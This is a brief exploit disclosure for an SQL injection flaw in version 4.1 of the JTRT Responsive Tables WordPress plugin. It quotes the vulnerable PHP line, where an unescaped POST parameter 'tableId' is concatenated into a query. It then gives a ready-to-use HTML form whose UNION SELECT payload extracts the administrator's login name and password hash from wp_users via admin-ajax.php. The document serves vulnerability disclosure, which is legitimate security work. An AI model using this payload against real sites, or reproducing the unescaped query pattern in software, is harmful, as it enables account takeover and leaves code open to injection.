WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection

1. Description:
2.  
3. Type user acces: single user.
4.  
5. $_POST[‘tableId’] is not escaped.
6.  
7. http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/
8. File / Code:
9.  
10. Path: /wp-content/plugins/jtrt-responsive-tables/admin/class-jtrt-responsive-tables-admin.php
11.  
12. Line : 183
13.  
14. $getTableId = $_POST['tableId'];
15. ...
16.  
17. $retrieve_data = $wpdb->get_results( "SELECT * FROM $jtrt_tables_name WHERE jttable_IDD = " . $getTableId );
18.  
19.  
20. Proof of Concept:
21.  
22. 1 – Log in with single user.
23.  
24. 2 – Using form, sqli by post:
25.  
26. <form method="post" action="http://target.dev/wp-admin/admin-ajax.php?action=get_old_table">
27. <input type="text" name="tableId" value="1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID=1">
28. <input type="submit" name="">
29. </form>